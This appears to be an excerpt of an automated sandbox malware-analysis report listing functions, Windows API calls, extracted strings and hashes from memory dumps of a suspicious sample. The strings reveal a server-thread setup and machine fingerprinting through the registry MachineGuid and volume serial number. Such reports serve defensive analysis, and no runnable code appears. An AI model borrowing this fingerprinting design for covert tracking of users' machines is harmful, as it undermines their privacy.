~, xrefs: 00007FFDA5BA3FC1
P, xrefs: 00007FFDA5BA3EBE
~, xrefs: 00007FFDA5BA4092
[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu), xrefs: 00007FFDA5BA405E
[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu), xrefs: 00007FFDA5BA3F60
[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu), xrefs: 00007FFDA5BA3E58
, xrefs: 00007FFDA5BA3D8C
, xrefs: 00007FFDA5BA3C70
~, xrefs: 00007FFDA5BA3EB9
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5BA4151
~, xrefs: 00007FFDA5BA3CD0

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: ErrorLast$CriticalSection$CreateThread$CountInitializeSpin$CopyEnterFileLeavefflushfwrite
String ID: $ $ $ $ $Done$P$P$P$P$P$[E] (%s) -> CreateThread(routine_accept) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_gc) failed(gle=%lu)$[E] (%s) -> CreateThread(routine_tx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_clients) failed(gle=%lu)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_queue) failed(gle=%lu)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$routine_accept$routine_gc$routine_tx$server_init$~$~$~$~$~
API String ID: 3214881788-719614687
Opcode ID: d638e0b7ae0cc837bf64db790b7c8563c2784f512e66f92d57f32784526b986c
Instruction ID: 040fd48c8053843387ee4481c230b1aee65f4cbe8bde30c75ce6e4771d91148a
Opcode Fuzzy Hash: d638e0b7ae0cc837bf64db790b7c8563c2784f512e66f92d57f32784526b986c
Instruction Fuzzy Hash: 04F1FC60F0EB0B83FB705714A8B43B925509B17B27F250B32D66E063E7DE6FA945824D

Function 00007FFDA5BA482C Relevance: 58.0, APIs: 11, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDA5BA5154: LoadLibraryA.KERNEL32 ref: 00007FFDA5BA5162

Part of subcall function 00007FFDA5BA50D3: GetProcAddress.KERNEL32 ref: 00007FFDA5BA50F3

FreeLibrary.KERNEL32 ref: 00007FFDA5BA48BF
GetNativeSystemInfo.KERNEL32 ref: 00007FFDA5BA490B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDA5BA4924
GetLastError.KERNEL32 ref: 00007FFDA5BA4932

Strings

~, xrefs: 00007FFDA5BA4B59
RtlGetVersion, xrefs: 00007FFDA5BA484C
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDA5BA4C7E
, xrefs: 00007FFDA5BA4B03
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA5BA48D9
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDA5BA4BE8
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDA5BA4944
MachineGuid, xrefs: 00007FFDA5BA4A53
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDA5BA4A5A
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDA5BA48A4
%, xrefs: 00007FFDA5BA4A39
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDA5BA4B35
ntdll.dll, xrefs: 00007FFDA5BA4834
sys_init, xrefs: 00007FFDA5BA489D, 00007FFDA5BA48D2, 00007FFDA5BA493D, 00007FFDA5BA4A1E, 00007FFDA5BA4AF0, 00007FFDA5BA4B2E, 00007FFDA5BA4BE1, 00007FFDA5BA4C77, 00007FFDA5BA4D50
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDA5BA4A4C, 00007FFDA5BA4B20
\, xrefs: 00007FFDA5BA4A90
C:\Windows, xrefs: 00007FFDA5BA491D, 00007FFDA5BA4A10
:, xrefs: 00007FFDA5BA4A8B
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDA5BA4A25
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDA5BA4D57
P, xrefs: 00007FFDA5BA4B62
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDA5BA4AF7

Memory Dump Source

Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true

Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 9fd6b73975f7bf016800440e9bc28cda26a8abd548152f339e05862e81f836a2
Instruction ID: d68925c72911801355547e79c13e1ec5ab80965e28e27cbd2a59ad6eb16e092e
Opcode Fuzzy Hash: 9fd6b73975f7bf016800440e9bc28cda26a8abd548152f339e05862e81f836a2
Instruction Fuzzy Hash: 77D18F21F0EA5A86FF208714E4703FA6350AF03F56F160932DA4E177A6DE6EE8448349

Function 00007FFDA55AC25C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDA55ABC64: LoadLibraryA.KERNEL32 ref: 00007FFDA55ABC72

Part of subcall function 00007FFDA55ABBE3: GetProcAddress.KERNEL32 ref: 00007FFDA55ABC03

FreeLibrary.KERNEL32 ref: 00007FFDA55AC2EF
GetNativeSystemInfo.KERNEL32 ref: 00007FFDA55AC33B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDA55AC354
GetLastError.KERNEL32 ref: 00007FFDA55AC362

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDA55AC48A
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDA55AC455
, xrefs: 00007FFDA55AC533
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDA55AC618
MachineGuid, xrefs: 00007FFDA55AC483
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDA55AC47C, 00007FFDA55AC550
C:\Windows, xrefs: 00007FFDA55AC34D, 00007FFDA55AC440
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDA55AC787
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDA55AC374
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDA55AC6AE
\, xrefs: 00007FFDA55AC4C0
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDA55AC2D4
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55AC309
~, xrefs: 00007FFDA55AC589
:, xrefs: 00007FFDA55AC4BB
P, xrefs: 00007FFDA55AC592
%, xrefs: 00007FFDA55AC469
sys_init, xrefs: 00007FFDA55AC2CD, 00007FFDA55AC302, 00007FFDA55AC36D, 00007FFDA55AC44E, 00007FFDA55AC520, 00007FFDA55AC55E, 00007FFDA55AC611, 00007FFDA55AC6A7, 00007FFDA55AC780
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDA55AC565
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDA55AC527
ntdll.dll, xrefs: 00007FFDA55AC264
RtlGetVersion, xrefs: 00007FFDA55AC27C

Memory Dump Source

Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true

Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: c817d551da7cc0452d1d9372f9cf211be133c768dc978ffa4264da6cb7e203b1
Instruction ID: dc52b638c0c50825da5a3d2848ec1eb86de881615554755b5202371625f497cc
Opcode Fuzzy Hash: c817d551da7cc0452d1d9372f9cf211be133c768dc978ffa4264da6cb7e203b1
Instruction Fuzzy Hash: A1D18329F0E64F85FB129F94E47837922909F47F50F150432EA4E173E3EE6EA8448789

Function 00007FFDA55D44CC Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDA55D4DF4: LoadLibraryA.KERNEL32 ref: 00007FFDA55D4E02

Part of subcall function 00007FFDA55D4D73: GetProcAddress.KERNEL32 ref: 00007FFDA55D4D93

FreeLibrary.KERNEL32 ref: 00007FFDA55D455F
GetNativeSystemInfo.KERNEL32 ref: 00007FFDA55D45AB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDA55D45C4
GetLastError.KERNEL32 ref: 00007FFDA55D45D2

Strings

[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDA55D4797
%, xrefs: 00007FFDA55D46D9
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDA55D49F7
RtlGetVersion, xrefs: 00007FFDA55D44EC
ntdll.dll, xrefs: 00007FFDA55D44D4
, xrefs: 00007FFDA55D47A3
\, xrefs: 00007FFDA55D4730
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDA55D46FA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55D4579
C:\Windows, xrefs: 00007FFDA55D45BD, 00007FFDA55D46B0
~, xrefs: 00007FFDA55D47F9
P, xrefs: 00007FFDA55D4802
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDA55D4544
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDA55D46EC, 00007FFDA55D47C0
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDA55D45E4
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDA55D46C5
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDA55D47D5
sys_init, xrefs: 00007FFDA55D453D, 00007FFDA55D4572, 00007FFDA55D45DD, 00007FFDA55D46BE, 00007FFDA55D4790, 00007FFDA55D47CE, 00007FFDA55D4881, 00007FFDA55D4917, 00007FFDA55D49F0
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDA55D4888
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDA55D491E
MachineGuid, xrefs: 00007FFDA55D46F3
:, xrefs: 00007FFDA55D472B

Memory Dump Source

Source File: 00000018.00000002.2877372074.00007FFDA55D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA55D0000, based on PE: true

Associated: 00000018.00000002.2877320076.00007FFDA55D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877397180.00007FFDA55E3000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877418496.00007FFDA55EC000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877440603.00007FFDA55EF000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000018.00000002.2877460137.00007FFDA55F0000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda55d0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 4ed05f86d46a17b0253bea74060348c378426cdfda12dd8b42f4cb128f3c7d95
Instruction ID: 8ebfb367a70434341590b6b3682bfdeca5bd5eafb914fff98eb63287c3f2fb02
Opcode Fuzzy Hash: 4ed05f86d46a17b0253bea74060348c378426cdfda12dd8b42f4cb128f3c7d95
Instruction Fuzzy Hash: 4FD19E2BF0E69AC5FB22DF55A4603B822A0AF43F94F150032DD4E17793DEACE8508749

Function 00007FFDAC0F348C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDAC0F3DB4: LoadLibraryA.KERNEL32 ref: 00007FFDAC0F3DC2

Part of subcall function 00007FFDAC0F3D33: GetProcAddress.KERNEL32 ref: 00007FFDAC0F3D53

FreeLibrary.KERNEL32 ref: 00007FFDAC0F351F
GetNativeSystemInfo.KERNEL32 ref: 00007FFDAC0F356B
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDAC0F3584
GetLastError.KERNEL32 ref: 00007FFDAC0F3592

Strings

P, xrefs: 00007FFDAC0F37C2
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDAC0F35A4
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDAC0F39B7
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDAC0F3795
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDAC0F3757
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDAC0F3504
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDAC0F36BA
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDAC0F38DE
:, xrefs: 00007FFDAC0F36EB
RtlGetVersion, xrefs: 00007FFDAC0F34AC
\, xrefs: 00007FFDAC0F36F0
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDAC0F36AC, 00007FFDAC0F3780
%, xrefs: 00007FFDAC0F3699
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDAC0F3685
~, xrefs: 00007FFDAC0F37B9
C:\Windows, xrefs: 00007FFDAC0F357D, 00007FFDAC0F3670
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC0F3539
sys_init, xrefs: 00007FFDAC0F34FD, 00007FFDAC0F3532, 00007FFDAC0F359D, 00007FFDAC0F367E, 00007FFDAC0F3750, 00007FFDAC0F378E, 00007FFDAC0F3841, 00007FFDAC0F38D7, 00007FFDAC0F39B0
MachineGuid, xrefs: 00007FFDAC0F36B3
ntdll.dll, xrefs: 00007FFDAC0F3494
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDAC0F3848
, xrefs: 00007FFDAC0F3763

Memory Dump Source

Source File: 00000018.00000002.2877621388.00007FFDAC0F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFDAC0F0000, based on PE: true

Associated: 00000018.00000002.2877603061.00007FFDAC0F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877645741.00007FFDAC102000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877665816.00007FFDAC10B000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877685903.00007FFDAC10E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877704160.00007FFDAC10F000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2877722830.00007FFDAC112000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac0f0000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: cdd964b842a92a4dc978594ff5c2acee5fc6d66eea055fb757a1eb4ae4faba1b
Instruction ID: 62d48051c33020b43038f3043d302202f8afc04a78f62a8e2198c99262d99fe8
Opcode Fuzzy Hash: cdd964b842a92a4dc978594ff5c2acee5fc6d66eea055fb757a1eb4ae4faba1b
Instruction Fuzzy Hash: 09D16F62F0F657C1FA268719E4603B92250AF40BF4F184132D94E47796DF2DECA4A38D

Function 00007FFDA557210C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDA5572A34: LoadLibraryA.KERNEL32 ref: 00007FFDA5572A42

Part of subcall function 00007FFDA55729B3: GetProcAddress.KERNEL32 ref: 00007FFDA55729D3

FreeLibrary.KERNEL32 ref: 00007FFDA557219F
GetNativeSystemInfo.KERNEL32 ref: 00007FFDA55721EB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDA5572204
GetLastError.KERNEL32 ref: 00007FFDA5572212

Strings

[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDA5572224
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDA5572184
sys_init, xrefs: 00007FFDA557217D, 00007FFDA55721B2, 00007FFDA557221D, 00007FFDA55722FE, 00007FFDA55723D0, 00007FFDA557240E, 00007FFDA55724C1, 00007FFDA5572557, 00007FFDA5572630
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDA557255E
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDA55721B9
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDA5572305
~, xrefs: 00007FFDA5572439
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDA55724C8
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDA5572637
P, xrefs: 00007FFDA5572442
ntdll.dll, xrefs: 00007FFDA5572114
:, xrefs: 00007FFDA557236B
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDA5572415
C:\Windows, xrefs: 00007FFDA55721FD, 00007FFDA55722F0
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDA557233A
MachineGuid, xrefs: 00007FFDA5572333
%, xrefs: 00007FFDA5572319
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDA557232C, 00007FFDA5572400
RtlGetVersion, xrefs: 00007FFDA557212C
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDA55723D7
, xrefs: 00007FFDA55723E3
\, xrefs: 00007FFDA5572370

Memory Dump Source

Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true

Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
String ID: $%$9e146be9-c76a-4720-bcdb-53011b87bd06$:$C:\Windows$MachineGuid$P$RtlGetVersion$SOFTWARE\Microsoft\Cryptography$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu)$[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu)$[E] (%s) -> RtlGetVersion failed(res=%08lx)$[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d)$[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d)$[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx)$[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s)$[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s)$\$ntdll.dll$sys_init$~
API String ID: 3828489143-883582248
Opcode ID: 5e62ecca713295fe955be0967b7d2f89ab1daee2a14d8cfdcbfcc6e33fcf6337
Instruction ID: 0b9ab08f12bfa02f74d9900ded9780ca500c1891b49f4995064c24ae28f55ef6
Opcode Fuzzy Hash: 5e62ecca713295fe955be0967b7d2f89ab1daee2a14d8cfdcbfcc6e33fcf6337
Instruction Fuzzy Hash: FAD1B129F0E65BC1FB228F54E8703B822A0AF43F54F950472E94D47B92DF2CE9859749

Function 00007FFDAC126E0C Relevance: 56.3, APIs: 10, Strings: 22, Instructions: 280
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FFDAC127734: LoadLibraryA.KERNEL32 ref: 00007FFDAC127742

Part of subcall function 00007FFDAC1276B3: GetProcAddress.KERNEL32 ref: 00007FFDAC1276D3

FreeLibrary.KERNEL32 ref: 00007FFDAC126E9F
GetNativeSystemInfo.KERNEL32 ref: 00007FFDAC126EEB
GetWindowsDirectoryA.KERNEL32 ref: 00007FFDAC126F04
GetLastError.KERNEL32 ref: 00007FFDAC126F12

Strings

, xrefs: 00007FFDAC1270E3
[I] (%s) -> Done(sys_uid=%016llx,sys_os_ver=%lu.%lu.%lu.%d.%d), xrefs: 00007FFDAC12725E
[E] (%s) -> GetWindowsDirectoryA failed(gle=%lu), xrefs: 00007FFDAC126F24
~, xrefs: 00007FFDAC127139
[E] (%s) -> GetVolumeInformationA failed(vol=%s,gle=%lu), xrefs: 00007FFDAC1270D7
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFDAC126EB9
C:\Windows, xrefs: 00007FFDAC126EFD, 00007FFDAC126FF0
P, xrefs: 00007FFDAC127142
sys_init, xrefs: 00007FFDAC126E7D, 00007FFDAC126EB2, 00007FFDAC126F1D, 00007FFDAC126FFE, 00007FFDAC1270D0, 00007FFDAC12710E, 00007FFDAC1271C1, 00007FFDAC127257, 00007FFDAC127330
9e146be9-c76a-4720-bcdb-53011b87bd06, xrefs: 00007FFDAC12702C, 00007FFDAC127100
RtlGetVersion, xrefs: 00007FFDAC126E2C
[I] (%s) -> GetWindowsDirectoryA done(sys_mach_guid=%s), xrefs: 00007FFDAC127115
:, xrefs: 00007FFDAC12706B
MachineGuid, xrefs: 00007FFDAC127033
ntdll.dll, xrefs: 00007FFDAC126E14
[E] (%s) -> RtlGetVersion failed(res=%08lx), xrefs: 00007FFDAC126E84
\, xrefs: 00007FFDAC127070
[E] (%s) -> strtol failed(sys_mach_guid=%s,errno=%d), xrefs: 00007FFDAC127337
%, xrefs: 00007FFDAC127019
[I] (%s) -> GetWindowsDirectoryA done(sys_win_dir=%s), xrefs: 00007FFDAC127005
SOFTWARE\Microsoft\Cryptography, xrefs: 00007FFDAC12703A
[I] (%s) -> GetVolumeInformationA done(vol=%s,vol_sn=%08lx), xrefs: 00007FFDAC1271C8

Memory Dump Source

Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true

Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd

Similarity

API ID: Library$AddressDirectoryErrorFreeInfoLastLoadNativeProcSystemWindows
